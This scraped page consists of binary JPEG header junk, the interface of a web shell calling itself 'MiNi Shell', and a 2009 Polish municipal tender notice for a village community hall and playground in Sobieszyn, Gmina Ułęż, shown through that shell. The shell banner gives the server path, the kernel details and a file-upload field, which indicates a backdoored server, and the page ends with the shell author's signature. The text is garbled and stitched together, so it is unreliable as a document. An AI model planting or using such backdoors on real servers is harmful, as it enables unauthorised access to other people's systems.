JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090723/251254-N-2009.html

<p class="kh_header"><b>Ułęż: Utworzenie świetlicy wiejskiej w Sobieszynie z zagospodarowaniem terenu wokół świetlicy na parkingi i plac zabaw dla dzieci</b><br>
<b>Numer ogłoszenia: 251254 - 2009; data zamieszczenia: 23.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ułęż , Ułęż 168, 08-504 Ułęż, woj. lubelskie, tel. 0-81 8667916, 8667028, faks 0-81 8667028.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ulez.bip.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie świetlicy wiejskiej w Sobieszynie z zagospodarowaniem terenu wokół świetlicy na parkingi i plac zabaw dla dzieci.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja zadania pod nazwą :
Utworzenie świetlicy wiejskiej w Sobieszynie z zagospodarowaniem terenu wokół świetlicy na parkingi i plac zabaw dla dzieci polegający na  :
1.Roboty budowlane i wykończeniowe 
-	roboty rozbiórkowe: rozebranie -pieców i trzonów kuchennych licowanych kaflami, elementów konstrukcji betonowych, podłóg drewnianych, posadzki z terakoty, posadzki cementowej, ścianek działowych z cegły, odbicie tynków wewnętrznych z zaprawy cementowo-wapiennej, wykucie otworów w ścianach,
-	wymiana stolarki - okiennej drewnianej na PCV rozwieralno - uchylne, drzwiowej drewnianej na aluminiowe dwuskrzydłowe, profil ciepły zewnętrzne i zimny wewnętrzne, montaż parapetów z konglomeratu,
-	wykonanie posadzki - podkłady betonowe na podłożu gruntowym o grubości 15 cm, izolacja pozioma z folii politylenowej, izolacja cieplna z płyt styropianowych o gr.6 cm. Warstwa wyrównawcza pod posadzki zatarta na ostro o gr.8 cm. Warstwa wierzchnia z płytek gres z cokolikami,
-	tynki wewnętrzne i roboty malarskie - uzupełnienie tynków wew. Kat III z zaprawy c.w. na ścianach i ościeżnicach, przygotowanie starych tynków , gruntowanie. Wykonanie wewnętrznych gładzi gipsowych dwuwarstwowych na ścianach i sufitach. Dwukrotne malowanie farbami emulsyjnymi. Zamurowanie otworów drzwiowych i wykonanie przesklepień,
-	wymiana instalacji elektrycznej z urządzeniami,
-	remont instalacji wodnej kanalizacyjnej z wymianą armatury,
-	elewacja - wykonanie okładzin z ,,SIDING na konstrukcji drewnianej, uzupełnienie tynków zewnętrznych na ścianach kat. III c.w, przygotowanie powierzchni pod malowanie, gruntowanie, dwukrotne malowanie farbą silikonową. Dwukrotne malowanie farbą olejną krat, balustrad, stolarki okiennej i konstrukcji stalowej. Montaż rynien i rur spustowych oraz wykonanie obróbek blacharskich,
-	chodniki , opaska i parking- rozbiórka chodników z płytek chodnikowych 50X50 i płyt betonowych, rozebranie krawężników betonowych, mechaniczne wykonanie koryta, ułożenie kostki betonowej o gr.6 i 8 cm na podsypce cementowo- piaskowej, ustawienie krawężników i obrzeży na ławie betonowej,
-	ogrodzenie -mechaniczne karczowanie pniaków z cięciem drewna piłą mechaniczną, wykonanie ogrodzenia z siatki z drutu ocynkowanego o wysokości 1,50 m na słupkach stalowych ocynkowanych z rur o sr.70 mm obsadzonych w gruncie i obetonowanych, cokół wykonany  z obrzeży betonowych. Bramy wjazdowe przesuwne i furtki z profili zamkniętych ocynkowanych,
-	plac zabaw- mechaniczne karczowanie pniaków z cięciem drewna piłą mechaniczną , niwelacja terenu oraz humusowanie z obsianiem trawą,
-	wyposażenie placu zabaw- montaż karuzeli ,,Jaś, huśtawek ,,Piotr, ,,Ważka , ,,Waga AA, zjeżdżalni ,,Skrzat oraz 5 sztuk ławek parkowych.


2. Zakup i montaż wyposażenia
stoły 4-osobowe	szt.	5
krzesła	szt.	20
stoliki pod sprzęt RTV	szt.	2
telewizor	szt.	1
odtwarzacz DVD	szt.	1
sprzęt grający (wieża, głośniki) 	zestaw	1
Biurko pod  komputer	szt.	1
zestaw komputerowy (komputer - 1 szt., monitor - 1 szt., klawiatura - 1szt., mysz - 1 szt., głośniki - 2 szt.)	zestaw	1
gry świetlicowe	szt.	10
szafy	szt.	2
stół pingpongowy	szt.	1
aparatura nagłaśniająca zewnętrzna (stojak,  mikrofon, mikser, kolumny głośnikowe aktywne szt 2)	zestaw	1
sprzęt do ćwiczeń ( atlas, hantle, sztanga, ławeczka)	zestaw	1.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.42.10.00-4, 45.43.21.20-1, 45.00.00.00-7, 45.44.21.00-8, 45.44.30.00-4, 45.26.00.00-7, 45.34.20.00-6, 45.11.27.23-9, 45.34.00.00-2, 45.23.31.40-2, 45.31.70.00-2, 45.33.00.00-9, 39.34.24.00-5, 37.40.00.00-2, 32.34.24.00-6, 32.32.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 6.1. Wysokość wadium

Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości:
15.000 zł (słownie: piętnaście  tysięcy złotych)

6.2.  Forma wadium

Wadium może być wniesione w:
   a) pieniądzu,
   b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że  
       poręczenie kasy jest zawsze poręczeniem pieniężnym,
   c) gwarancjach bankowych,
   d) gwarancjach ubezpieczeniowych,
   e) poręczeniach udzielanych przez podmioty, których mowa w art. 6b ust. 5 pkt 2. ustawy z dnia 9  
       listopada  2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości(Dz. U. z 2007 r. Nr 42, 
       poz. 275, ze zm.)
i za zgodą Zamawiającego w innych formach przewidzianych w Pzp.

6.3. Termin i miejsce wniesienia wadium

6.3.1. W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy wpłacić przelewem na konto   
          Zamawiającego w Banku Polskiej Spółdzielczości Oddział Lublin Filia Ułęż Nr 
          89193017092005004001450004. 
6.3.2. W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach określonych w pkcie 6.2  
          SIWZ kopię poświadczoną za zgodność z oryginałem należy dołączyć do oferty. Ponadto do oferty 
          należy dołączyć w osobnej koszulce, oryginał tego dokumentu. Oryginału nie bindować i nie zszywać  
          z ofertą.
6.3.3. Wadium musi być zabezpieczone na okres 30 dni, licząc od daty składania ofert - termin związania 
           ofertą. Oferta zabezpieczona na okres krótszy niż wymagany zostanie odrzucona.
6.3.4. Nie wniesienie wadium w wymaganym terminie oraz wymaganej wysokości i formie skutkuje  
           wykluczeniem oferenta z postępowania.
6.3.5.  Złożone poręczenie lub gwarancja muszą zawierać w swojej treści zobowiązanie zgodne z art. 46 
           ust.5 Pzp, a mianowicie - Zamawiający zatrzymuje  wadium wraz z odsetkami, jeżeli Wykonawca,  
           którego oferta została wybrana:
      a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w  
           ofercie,
      b)  nie wniósł zabezpieczenia należytego wykonania umowy,
      c)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po  
           stronie Wykonawcy. 
    

 6.4.  Zwrot wadium

 6.4.1. Zamawiający niezwłocznie zwróci wadium gdy:
       1) upłynął termin związania ofertą;
       2) zawarto umowę i wniesiono zabezpieczenie należytego wykonania umowy;
       3) Zamawiający unieważnił postępowanie, a protesty zostały ostatecznie rozstrzygnięte lub upłynął 
            termin do ich składania;
       4) Zamawiający zwróci wadium w ciągu 3 dni od daty pisemnego zgłoszenia wniosku przez    
            Wykonawcę:
             a) który wycofał ofertę przed upływem terminu składania ofert;
            b) który został wykluczony z postępowania;
             c) którego oferta została odrzucona.
  6.4.2. Złożenie przez Wykonawcę, którego oferta została odrzucona lub wykluczonego z postępowania, 
             wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez niego prawa do wniesienia 
             protestu.
  6.4.3. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z 
            umowy rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty 
             prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy 
             wskazany przez Wykonawcę.
  
   6. 5.   Utrata wadium

   Wykonawca, którego oferta została wybrana traci wadium wraz z odsetkami na rzecz  
    Zamawiającego, w razie zaistnienia okoliczności określonych w pkcie 6.3.5 litery a, b, c.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:
1)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 Pzp;
2)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
a) przedłożą aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
                                                                                  
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia  
4)	posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia,   
 a) wykażą wykonanie jako wykonawca lub podwykonawca w okresie  ostatnich pięciu lat przed wszczęciem niniejszego postępowania , a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie , minimum 2 robót budowlanych polegających na budowie lub remoncie obiektu kubaturowego w technologii tradycyjnej o kubaturze nie mniejszej niż 400 m3 każda, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenie dokumentów  potwierdzających , że roboty zostały wykonane należycie                             
5)	przedłożą polisę lub inny dokument ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej;
6)	zamawiający wymaga wykazania  kierowników budowy w zakresie konstrukcyjno-budowlanym, instalacji elektrycznych i sanitarnych. Należy załączyć odpowiednie uprawnienia i poświadczenia o przynależności do Okręgo?wej Izby Samorządu Zawodowego w oparciu o art. 6 ust. 1 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów oraz urbanistów (Dz.U. z 2001 r., Nr 5, poz. 42, ze zm.).

Uwaga:
Zamawiający wykluczy z postępowania Wykonawcę, który nie spełnia wymaganych warunków oraz jeżeli stwierdzi, że dostarczone przez niego informacje istotne dla prowadzonego postępowania są nieprawdziwe..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 4.2.1. Wykonawca zobowiązany jest złożyć w terminie i miejscu wskazanym w pkt. 7.2. i formie określonej w Części 5 SIWZ Ofertę na formularzu oferty, o treści zgodnej z określoną we wzorze stanowiącym załącznik Nr 1 do SIWZ.
4.2.2. Do oferty należy dołączyć oświadczenia oraz dokumenty potwierdzające spełnianie warunków:
1)	Oświadczenie wykonawcy, że spełnia warunki określone w art. 22 ust. 1 oraz nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych - załącznik nr 4 (w przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy w zakresie w jakim spełniają warunki udziału w postępowaniu)- według wzoru określonego w załączniku Nr 2do SIWZ.

2)	Wykaz osób,  które będą uczestniczyć w wykonywaniu zamówienia (kierownik budowy, kierownicy robót ) posiadające wymagane uprawnienia. Zamawiający wymaga wykazanie kierowników w zakresie konstrukcyjno-budowlanym ,instalacji elektrycznych i instalacji sanitarnych- według wzoru określonego w załączniku Nr 3 do SIWZ. Należy załączyć odpowiednie uprawnienia i poświadczenia o przynależności kierownika do Okręgowej Izby Inżynierów Budownictwa,

3)	Wykaz wykonanych w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum  2  robót budowlanych  polegających na budowie lub remoncie obiektu kubaturowego w technologii tradycyjnej o kubaturze nie mniejszej niż 400 m3 każda  z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - załącznik Nr4 do SIWZ (w przypadku podmiotów występujących wspólnie dokument ten składają ci Wykonawcy (lub Wykonawca), którzy spełniają warunek udziału w postępowaniu),

4)	Parafowany wzór umowy jako akceptacja jej treści i warunków według załącznika Nr 5 do SIWZ

5)	Wykaz podwykonawców - zał. Nr 6 (załączyć w przypadku gdy Wykonawca zamierza zlecać prace podwykonawcom) (w przypadku podmiotów występujących wspólnie dokument ten składa pełnomocnik reprezentujący Wykonawców w postępowaniu),

6)	Wyceniony przedmiar robót (Kosztorys ofertowy) branży :budowlana, elektryczna i sanitarna,-  załączniki 7,8,9 do SIWZ,

7)	Wycena wyposażenia -według załącznika Nr 10 do SIWZ

8)	 Polisę lub inny dokument (aktualny na dzień składania ofert) potwierdzający, 
że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  (w przypadku podmiotów występujących wspólnie dokument ten składają ci Wykonawcy (lub Wykonawca), którzy spełniają warunek udziału w postępowaniu),

9)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy),

10)	Zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału ZUS lub KRUS potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek ubezpieczenia zdrowotnego lub społecznego lub zaświadczeń że uzyskał przewidziane prawem zwolnienie , odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu - wystawione nie wcześniej jak 3 miesiące przed upływem składania oferty. 

Uwaga:
Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej powinien złożyć do?kumenty zgodnie z § 2  rozporządzenie Prezesa Rady Ministrów
z dnia 19 maja 2006 r.  w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane 
(Dz. U. Nr 87, poz. 605, ze zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.ulez.bip.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ułęż, Ułęż 168, 08-504 Ułęż, pok. Nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2009 godzina 09:00, miejsce: Urząd Gminy Ułęż, Ułęż 168, 08-504 Ułęż, sekretariat Urzędu.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com